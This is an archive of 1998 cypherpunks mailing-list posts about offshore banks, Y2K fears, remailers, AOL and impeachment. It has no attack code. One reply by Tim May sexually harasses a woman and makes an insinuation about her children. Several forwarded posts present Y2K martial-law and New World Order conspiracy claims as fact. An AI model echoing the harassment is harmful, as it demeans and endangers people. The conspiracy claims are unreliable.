            wants to deal with people interested in opening
            and operating such accounts. If the information
            provided by our firm does not satisfy you, then
            it definitely means that you are not interested
            in opening an offshore bank account. 

Well actually it means that any sane person would regret
handing over their money as soon as they discover the name of
the bank.

Some time ago a bank in Russia opened.  Its name was "Fuck
you" in Russian, spelt backwards.  The bank soon disappeared,
with the depositors money.

What is "fuck you" in Latvian? 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     5f1OaRdJKerB2Mx0HCiBWPBIAzs9ziDsmpdrl/m1
     4cfQ2P6hHFL6HZHebpSnhsUfLL4PwuUmFSRu6dP+9




>
>
>
>
>
>
>
>
>  
> 

-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 13 Sep 1998 18:52:09 +0800
To: cypherpunks@Algebra.COM
Subject: Offshore Banking In Latvia
Message-ID: <199809132350.QAA02796@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
> > Found this: http://offshorehaven.nu/banking
> > noidea whether a trap or a jewel.

Just in case my first message was unclear:

Offshore banking in Latvia looks good.

The above website looks like a con.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     JXDMmaEyma+jN7wyVhvlYcOrLB7iNaWSDaDfE2dl
     4B2lFoTKEej/7263gNwJ8CpUWXMXIdco2pG0PzcFL
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Sun, 13 Sep 1998 16:31:01 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Revenge of the AOLHoles
In-Reply-To: <199809110152.DAA09397@replay.com>
Message-ID: <Pine.GSO.4.00.9809131721570.14353-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain



> The problem is that most of the AOL users who publish to the net seem to
> be morons. They use some annoying Russo-Germanic quoting style, they can't
> use English, they're clueless, they post off-topic, or something else. 

In all fairness, many of the users on AOL *know* that the AOL quoting
style is utterly horrible.  Unofrtunatley, they don't have much choice in
what they use.

Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Well now I am a Mommy!" <xenedra@hotmail.com>
Date: Sun, 13 Sep 1998 20:37:44 +0800
To: cypherpunks@toad.com
Subject: sixdegrees
Message-ID: <19980914012729.12617.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



hi,

I see you added me as a friend..... just wondering who you are.  :)

Christy

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 12:17:03 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809131705.TAA10263@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



son of gomez




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 13 Sep 1998 21:23:05 +0800
To: "Well now I am a Mommy!" <cypherpunks@toad.com
Subject: Re: sixdegrees
In-Reply-To: <19980914012729.12617.qmail@hotmail.com>
Message-ID: <v03130305b2222c03307a@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:27 PM -0700 9/13/98, Well now I am a Mommy! wrote:
>hi,
>
>I see you added me as a friend..... just wondering who you are.  :)
>
>Christy
>

Hi Christy,

Got your name from the Stalker's R Us group. Please post more details about
your personal fantasies. Send us nude pictures, too.

You say you're a Mommy. Hope there are no stretch marks.

Oh, and your children can join our group too. Got any photos?

--Tim May



(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 12:30:38 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809131728.TAA11651@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Sunday, September 13, 1998 - 19:23:30 MET

Talk about unimaginable control. How many times 
did Monica provoke William Jefferson Clinton? 
Four or five, before he deigned that there should
be a denouement? And why? Because, deep in his 
heart, he knew it was just wrong!  Impeachment?  
Hardly.  Instead, Congress should award this Man,
our magnificent President, a new decoration, 
the "Presidential Blue Spheres of Steel"!  
Can one imagine any other person on Earth with 
such iron control?  Fortunately, yes! 
And who could this be?  You guessed it!  
None other than Will-O-Iron's buddy and potential 
replacement, Ol Stiffy himself, Al.  
O blessed land.  O fortunate realm. This is one 
American who will sleep more soundly tonight, 
knowing that, whatever the provocation, there can 
be no accidental discharge of US weaponry, that 
the finger on the button is controlled by a 
Will-of-Iron.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 22:30:22 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Y2K: 316,862 Reasons Why FedReserve Won't Make It
Message-ID: <199809140329.UAA27154@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Y2K: 316,862 Reasons Why FedReserve Won't Make It
Date: Sat, 12 Sep 1998 22:24:39 -0500
To: believer@telepath.com

North's Comments about Article Below:

 In June, 1998, a pair of experts -- one is a y2k optimist -- produced a
report on the likelihood of system-wide failures based on the number of
external exchanges of data an organization has. It is called the
Beach/Oleson Pain Index. (Oleson is the optimist; Beach edits CIO
MAGAZINE.) BUSINESS TODAY reported: 

 "The Beach/Oleson Pain Index illustrates how the Y2K software glitch is
further compounded by connectivity to external organizations, such as
suppliers, customers, banks and other business partners." 

 There is a 10.4% likelihood of catastrophic failure for any organization
with over 1,000 external connections. It is only 0.5% for 50 connections,
1.1% for 100, 5.4% for 500. 

 The Federal Reserve System, the most important of all central banks, has
316,862. 

 This is from a July 1, 1998 report of the General Accounting Office of the
U.S. Congress. 

 The report outlines what every organization must do to protect itself from
importing noncompliant data. This list is long, and the task is gigantic.
Congressional committees should insist on receiving detailed quarterly
progress reports on these procedures from the Federal Reserve. Of course,
no elected official would be so bold or so impolite as to ask, let alone
demand. To ask such questions, the questioner would have to assume that
Congress has effective authority over the Federal Reserve, as the law says.
No Congressman who has served over one term is so naive as to believe that. 

 * * * * * * * * * 

 Federal agencies reported that they have a total of almost 500,000 data
exchanges with other federal agencies, states, local governments, and the
private sector for their mission-critical systems. Almost 90 percent of the
exchanges were reported by the Federal Reserve and the Department of
Housing and Urban Development (HUD) which reported having 316,862 and
133,567, respectively. The Federal Reserve exchanges data with federal
agencies and the private sector using software it provides to these
entities. . . . 

 As part of their Year 2000 correction efforts, organizations must identify
the date formats used in their data exchanges, develop a strategy for
dealing with exchanges that do not use 4-digit year formats, and implement
the strategy. These efforts generally involve the following steps. 

 -- Assess information systems to identify data exchanges that are not Year
2000 compliant. 

 -- Contact the exchange partner and reach agreement on the date format to
be used in the exchange. 

 -- Determine if data bridges and filters are needed. 

 -- Determine if validation processes are needed for incoming data. 

 -- Set dates for testing and implementing new exchange formats. 

 -- Develop and test bridges and filters to handle nonconforming data. 

 -- Develop contingency plans and procedures for data exchanges and
incorporate into overall agency contingency plans. 

 -- Implement the validation process for incoming data. 

 -- Test and implement new exchange formats. 

 The testing and implementation of new data exchanges must be closely
coordinated with exchange partners to be completed effectively. In addition
to an agency testing its data exchange software, effective testing involves
end-to-end testing--initiation of the exchange by the sending computer,
transmission through intermediate communications software and hardware, and
receipt and acceptance by receiving computer(s), thus completing the
exchange process. . . . 

 The Federal Reserve has 2-digit and 4-digit year formats in its data
exchanges. It plans to use 4-digit formats for all exchanges in the future,
but will continue using the 2-digit year format for some exchanges and have
exchange partners bridge to these if necessary. Federal Reserve's Year 2000
officials estimated that 20 percent of their data exchanges have 2-digit
year formats. They also told us that they have not set a target date for
the conversion to 4-digit year formats. . . .
----------------------------------
Source:  Business Today
http://www.businesstoday.com/techpages/y2kindex03.htm

BT EXCLUSIVE: Local researchers predict Y2K pain 

Wednesday, June 3, 1998

by Bill Burke/BusinessToday staff 

A team of technology researchers has come up with an index that they say
can tell a business just how bad its Year 2000 computer problem is going to
be.

The "Beach/Oleson Pain Index" is a chart of Y2K probabilities and
predictions based on a formula developed by team leaders Gary Beach,
publisher of CIO magazine, and International Data Corp. analyst Tom Oleson.

The index determines the "degree of pain" companies are likely to
experience when the Millennium Bug strikes.

The Beach/Oleson Pain Index illustrates how the Y2K software glitch is
further compounded by connectivity to external organizations, such as
suppliers, customers, banks and other business partners.

The pair will unveil the index today at a Year 2000 conference in Omaha.

In the end, Beach says, no one is going to make it through the Millennium
threshold untouched.

"Realistically, no connected company can expect to survive the Year 2000
unscathed," Beach said. 

He said the formula answers the fifty-thousand dollar question: 'Just how
bad is it going to be?'

The index works by taking a company's number of connected applications and
plugging that figure into the index. 

"A company can determine the severity of its Year 2000 problem and create
an appropriate contingency plan," Beach said.

The index can help companies plan for the deadline, and develop contingency
plans, say the designers.

"Companies implementing various Year 2000 compliance projects must come to
the realization that the Year 2000 problem is not 100 percent solvable,"
Oleson said.

The index uses the number of applications a company has connected to
external partners, vendors and customers to determine the severity of the
Y2K situation. The probability of experiencing a Year 2000 problem is
broken down into four degrees of severity: Annoying; Disruptive; Business
Critical and Catastrophic. 

                "0">

                  Number of
                 Connected
                 Applications
                            Probability:
                            Catastrophic
                                        Probability:
                                        Business
                                        Critical
                                                   Probability:
                                                   Disruptive
                                                              Probability:
                                                              Annoying
                 5
                             0.1%
                                        1.0%
                                                   3.7%
                                                              7.4%
                 10
                            0.1%
                                        2.1%
                                                   7.3%
                                                              14.3%
                 20 
                            0.2%
                                        4.1%
                                                   14.0%
                                                              26.5%
                 50 
                            0.5%
                                        10.0%
                                                   31.4%
                                                              53.7%
                 100 
                            1.1%
                                        19.0%
                                                   52.9%
                                                              78.6%
                 500 
                            5.4%
                                        65.0%
                                                   97.7%
                                                              100.0%
                 1000 
                            10.4%
                                        87.8%
                                                   99.9%
                                                              100.0%




-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 22:30:03 +0800
To: cypherpunks@cyberpass.net
Subject: IP: British Openly Prepare for Y2K Martial Law
Message-ID: <199809140329.UAA27171@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: British Openly Prepare for Y2K Martial Law
Date: Sat, 12 Sep 1998 22:26:39 -0500
To: believer@telepath.com

Source:  http://www.garynorth.com/y2k/detail_.cfm/2553

Category:  Martial_Law
Date:  1998-09-11 13:47:42
Subject:  British Openly Prepare for Y2K Martial Law
Link:  http://www.independent.co.uk/stories/A1109820.html

 Comment: 

 The British government is way ahead of every other nation in facing up to
the implications of y2k. 

 It is obvious the the U.S. military is preparing for martial law in late
1999, but no official publicly admits that this is the case. 

 The British are more forthright. 

 This is from THE INDEPENDENT (Sept. 11). [The link was dead within hours.] 

 * * * * * * * * 

 TROOPS may be on the streets in the year 2000 under emergency Home Office
plans to maintain vital services which could be crippled by the millennium
computer bug. 

 Armed forces will be on standby to help councils and police provide
disaster relief if key infrastructures such as hospitals, water supplies
and roads are hit by the electronic change. 

 The Home Office confirmed yesterday that local authorities are being
encouraged to draw up contingency plans to deal with the "nightmare
scenario" of failed traffic lights, disabled water pumping stations, fuel
shortages and other disrupted services. 

 The bug, which represents the inability of most computers and electronic
systems to deal with the change of date from 1999 to 2000, could also hit
vital equipment in hospitals, lifts, benefits payments and phone lines. 

 Most computer experts believe that major failures are unlikely, but
councils, which have a statutory duty to provide emergency relief, have
been told to prepare for the worst. They will be allowed to use the Armed
Forces Military Aid to Civil Authorities Act to call in emergency help. . . . 

 Rail, telecommunications, gas and electricity regulators were joined by
BT, Shell, Transco and Trailtrack to agree ways to reassure the public that
their computers were being adapted to avoid the bug. . . . 

 In one key sanction, BT and Cable and Wireless have been told they will be
given the power to disconnect firms that corrupt phone connections. . . . 

 Home Secretary Jack Straw is ultimately responsible for emergency planning
as chairman of a body called the Civil Contingencies Committee. The Home
Office Emergency Planning Division will meet this month to firm its own
proposals. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 23:06:56 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Impeachment Petition
Message-ID: <199809140329.UAA27182@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: vols-fan@juno.com (Football Fan)
Subject: IP: Impeachment Petition
Date: Sat, 12 Sep 1998 22:59:15 -0500
To: baldmccoy@prodigy.net, PiercedEar@juno.com, TTMCCOY@juno.com, psm127_dad@mailcity.com, phmitch@mindspring.com, stringtickler@hotmail.com, Jimjean5013@juno.com, laney@arkansas.net, JESSICA.HARDAGE@charleston.af.mil, teyze-barbi@juno.com, rjohnson@bstream.com, iarthuriarthur@juno.com, w-t-14@juno.com, Bripowell@nidlink.com, supertrician@juno.com, barsotti@bstream.com

http://congress.nw.dc.us/impeach/petition.html




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 22:30:40 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Germ sabotage scare empties city buildings-Australia
Message-ID: <199809140329.UAA27192@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Germ sabotage scare empties city buildings-Australia
Date: Sun, 13 Sep 1998 08:49:10 -0500
To: believer@telepath.com

Source:  The Australian	
http://www.theaustralian.com.au/webie.asp?URL=/state/4366234.htm>http://www.
theaustralian.com.au/webie.asp?URL=/state/4366234.htm

Germ sabotage scare empties city buildings
 The Courier-Mail - 12sep98

POLICE are investigating a possible attempt to sabotage a Brisbane city
building by putting the potentially deadly legionella bacteria in the
air-conditioner.

A canister suspected of containing the bacteria was found in the water
cooling system for the Mercantile Mutual building's air- conditioning unit
on Thursday.

Police suspect the canister was placed there deliberately because recent
routine tests on the Edward Street building's air-conditioning showed no
sign of the deadly bacteria in its system.

Det Snr-Sgt Bryan Paton said the maintenance company responsible for the
unit had not seen the canister when it previously checked the water cooling
tower.

"There is an indication that the device has been put in the water
deliberately and there is a concern there may have been some legionella
bacteria in the device and we have to wait for those results," Sgt Paton said.

"It wasn't a threat to the public or anybody and the air-conditioning
system has since been decontaminated but the concern is that someone has
done it deliberately. 

"At this stage we are treating it very seriously."

Police also are investigating how someone got access to the
air-conditioning unit. The canister sparked a mass evacuation of another
city building yesterday when it was delivered there by mistake. 

Maintenance workers delivered the canister to the Mercantile Mutual
building managers, whose offices are in the MLC building. 

The MLC building, in George Street, was evacuated about 2pm yesterday when
the canister, sealed in a metal container, was discovered by office staff.

Police and fire and ambulance crews were called to the scene and two
Queensland Fire Service officers wearing protective clothing removed the
canister.

The building was declared safe 90 minutes later and staff returned to work.
Insp John Flanagan said the evacuations were a precautionary measure and
the canister had been taken to the Government Chemical Laboratory for
analysis.

The company responsible for managing the MLC building refused to comment,
but a staff member said the scare had been blown out of proportion.

The bacteria needs a moist environment to develop into the water-borne
legionnaires' disease which can cause pneumonia, fever and death.

The disease is contracted by inhaling air contaminated by air-conditioning
cooling towers, or through whirlpool spas and showers containing
contaminated water.

The Australian upper limit for legionella bacteria in air- conditioning is
a colony count of 10,000. The Mercantile Mutual building had a colony count
of 2000. 

Sgt Paton said police did not know the reason for the possible sabotage and
no demands or threats had been made. "People maintaining the
air-conditioning units in other buildings should be aware of this and
ensure all proper precautions are made," Sgt Paton said.

Brisbane Southside Public Health Unit medical officer Brad McCall said
legionella was a very common bacterium found in creeks, ponds,
air-conditioning cooling towers and hot and cold water taps.

(c) News Limited 1998
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 22:30:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Two Reporters Attacked at Governor's Rally*
Message-ID: <199809140329.UAA27203@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: vols-fan@juno.com (Football Fan)
Subject: IP: Two Reporters Attacked at Governor's Rally*
Date: Sun, 13 Sep 1998 10:55:22 -0500
To: ignition-point@majordomo.pobox.com

Alex@989kjfk.com

**********************************************
Quantum Reality News 
Two Reporters Attacked at Governor's Rally*
***********************************************

	This morning two Free Press Reporters at Governor George
Bush's Rally at the Du Pont Factory in Round Rock Texas were
assaulted and silenced from questioning Gov. Bush, while asking
pertinent questions.  Questions specifically about the CFR and
Federal Reserve involvement in Texas and the US.  No response was
given and orders were immediately given to the Secret Service and
Texas DPS, to remove the reporters.

 Alex Jones Alex@989kjfk.com "Talk Radio Show Host for KJFK 98.9
FM" [www.989kjfk.com] Austin and Central Texas and "Republic National
Radio Broadcasting System" and his Producer Mike Hansen of the Austin
Access TV Show "Exposing Corruption" Channel 10 ACTV were grabbed and
roughed up and removed from the rally by force.  Alex Jones was
forceably arrested and taken away and later released by a radio call
to the police unit.  The radio transmission instructed the officers
to release Alex Jones.  Governor Bush had ordered his release
stating, they had nothing to hold him on.  Mike Hansen while filming
the incident was hit from behind in an attempt to break his camera. 
The blow thrown from behind nearly knocked Hansen off his feet.  Mike
Hansen was not near the scuffle or in the area, he was filming from a
distance.  Both men received injuries.

	Not only were their 1st Amendment rights trampled and
forceable abridged by the Secret Service and DPS agents but their
questions were ignored, questions that are very important to voters. 
Evidentially these questions, that many of Governor Bush's
constituents are asking, were not address by our Governor, and
possible President hopeful.  The Question were about the Federal
Reserve control of our currency and it's role in the perpetuation of
oppressive debt in our country.  The active part the CFR (Council on
Foreign Relations) are playing in the take over and control of our
Country and their role in movement toward the New World Order.

	People expect the same accountability from the Governor, that
Governor Bush has been talking about in his campaign advertisements. 
Why were these citizens attacked?  Why were these questions so
offensive?  A Public Servant should be able to stay cool and have an
interest in all of his constituents and all their concerns.  If our
leadership will not calmly answer honest questions, it leads us as
responsible informed voters to ask questions of ourselves.  Why
aren't all of Governor Bush's constituents concerns and views
addressed?  Are special interest views and concerns, more valid or
more important than the majority of people and voters?  Is our
leadership truly representing "We the People" if they have someone
removed that asks a controversial question?

reporter: Randy Clark/Quantum Reality

---
You are currently subscribed to tuac-alerts as: [vols-fan@juno.com]
To unsubscribe, forward this message to leave-tuac-alerts-184675B@XC.Org


--------- End forwarded message ----------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 13 Sep 1998 22:30:45 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Vote on Clinton
Message-ID: <199809140329.UAA27214@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: vols-fan@juno.com (Football Fan)
Subject: IP: Vote on Clinton
Date: Sun, 13 Sep 1998 19:24:26 -0500
To: baldmccoy@prodigy.net, PiercedEar@juno.com, TTMCCOY@juno.com, psm127_dad@mailcity.com, phmitch@mindspring.com, stringtickler@hotmail.com, Jimjean5013@juno.com, laney@arkansas.net, JESSICA.HARDAGE@charleston.af.mil, teyze-barbi@juno.com, rjohnson@bstream.com, iarthuriarthur@juno.com, w-t-14@juno.com, Bripowell@nidlink.com, supertrician@juno.com, barsotti@bstream.com

Dear Friends:
      MSNBC has a poll asking whether Clinton should go!  Right now its
70%
yes and 30% No.  Please go and vote.  Lets tell Clinton where he gets
off!
There was  117904 responses.

http://www.msnbc.com/news/default.asp

http://www.msnbc.com/news/default.asp 




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 13:56:36 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809131855.UAA18056@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



How about a line-of-sight (LOS) infrared network, a neighbor-net?
Always thought this could be a method for a local technical
entrepreneur to fund and share their personal T-1 link or for
some small network enterprise to avoid local and US federal 
regulations and compete with the big cable and telephone 
companies. Appears that LOS infrared is currently unregulated
and could be encrypted.

Get enough people in a neighborhood to put LOS infrared 
relays on top of their houses, allow them to tap in, and feed this 
neighbor-net from some central point that is equipped with 
a more conventional link.

I dunno why infrared, which theoretically has much more 
capacity than a phone line or coax cable, seems currently so slow,
 i.e., less than 10 MB in many commercial offerings. I've no cost 
estimate for the roof top boxes. Heavy wet weather, fog, rain, 
snow obviously can affect LOS infrared, esp. low power.

Personally, I would like more choices than just the phone and cable 
lines, especially something that is locally controlled. However, I 
imagine that if any significant traffic was generated over such 
infrared or wireless neighbor-nets,  the Feds would eventually 
step in and regulate them.  They'd probably want to regulate the 
traffic over a taut string, between paper cups.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.hdc.net>
Date: Sun, 13 Sep 1998 21:54:56 +0800
To: cypherpunks@cyberpass.net
Subject: Remailers
Message-ID: <35FCA076.6F15@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



Are _any_ of the remailers working?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 13 Sep 1998 22:13:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Remailers (fwd)
Message-ID: <199809140335.WAA23282@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 13 Sep 1998 21:49:58 -0700
> From: nnburk <nnburk@cobain.hdc.net>
> Subject: Remailers

> 
> Are _any_ of the remailers working?
> 

Which remailers? The CDR members or the anonymous remailers?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Sun, 13 Sep 1998 22:37:47 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Offshore Banking In Latvia
Message-ID: <001b01bddf90$ffbb6dc0$95060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain



I have had dealings with the Paritate bank in Latvia.  Good bank and no con.

http://www.paritate.lv

Lots of different types of accounts.  
Regards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 13 Sep 1998 18:10:34 +0800
To: cypherpunks@toad.com
Subject: Re: MISTY encryption algorithm source code
Message-ID: <19980913230004.14914.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Nobuki Nakatuji wrote:

> MISTY source code posted by me at long ago had many mistake.
> Attachment file are revised MISTY source code and revised readme.
> Thanks.
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com

BRAIN used by you always since at long ago have many insect. Attachment
brain not here because was exhausted in decypher you message. You go back
at Hotmail now and stop spam Cypherpunks list. Chop chop. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<bv7b5063@auto.sixdegrees.com>
Date: Sun, 13 Sep 1998 22:12:38 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809140305.UAA16429@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: Joe Cypherpunk
sixdegrees Password: kindread

In response to your request for a new sixdegrees(tm) password, 
we have sent you the following temporary password: kindread. 

As soon as you come to the site, http://www.sixdegrees.com , and use 
it to log-in on the home page, it will become your official 
password, and your old password will be deactivated. 

(If you end up remembering your old password and use that to 
log-in at the site before using this new temporary password, 
the temporary password will be deactivated.)

This may seem wacky, but it's for your security. And, either 
way, once you successfully log-in at the site, you can go to 
your personal profile and choose whatever password you like - 
in fact, we encourage you to do so.

If you never requested a new password and got this message in 
error, just continue using your old password and e-mail us at 
issues@sixdegrees.com. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================




E.SI.REQPW.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 16:49:12 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809132148.XAA29865@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Found this: http://offshorehaven.nu/banking/index.html
no idea whether a trap or a jewel.









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 18:15:52 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809132309.BAA02915@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



"It has been claimed, for example, that free application of cryptography
enables drug traffickers and terrorists to communicate in secret, without
the law enforcement officials being able to intercept their messages. In
some countries, strong encryption has been banned or the keys have to be
escrowed for government officials. With invisibility readily available to
anyone with moderate programming skills, it is obvious that any such
measures are ineffective. "

This from the most recent online 
National Counterintelligence Center
Counterintelligence News and Developments
Volume 2
June 1998

http://www.nacic.gov/cind/june98.htm#rtoc4

"In some countries" indeed.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 13 Sep 1998 18:12:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Revenge of the AOLHoles
Message-ID: <199809132311.BAA03065@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 13 Sep 1998, Ryan Anderson wrote:

> 
> > The problem is that most of the AOL users who publish to the net seem to
> > be morons. They use some annoying Russo-Germanic quoting style, they can't
> > use English, they're clueless, they post off-topic, or something else. 
> 
> In all fairness, many of the users on AOL *know* that the AOL quoting
> style is utterly horrible.  Unofrtunatley, they don't have much choice in
> what they use.

Sure they do. They can use a different mail reader. (After all, 32-bit AOL
allows AOL users to use all the TCP/IP protocols...) They can cut and
paste manually, or, probably best, they can go to another ISP. 

I understand what you're saying, Ryan, and I understand what they're
saying, but there all alternatives out there; they just don't want to use
them. In fact, they've installed proprietary packages that do this. There
are plenty of free alternatives out there which don't have this problem.

If my ISP pushed a bunch of proprietary software down my throat, I'd find
another ISP. That goes double if the proprietary software sucks. That goes
triple if the software sucks and the ISP is trying to get every idiot they
can to use it. (I got a "100 hours free network abuse" disk in the mail
recently from AOL.) 

Another AnonMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sun, 13 Sep 1998 15:33:18 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980913130607.4039E-100000@well.com>
Message-ID: <Pine.LNX.3.96.980914042440.31317C-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 13 Sep 1998, Declan McCullagh wrote:

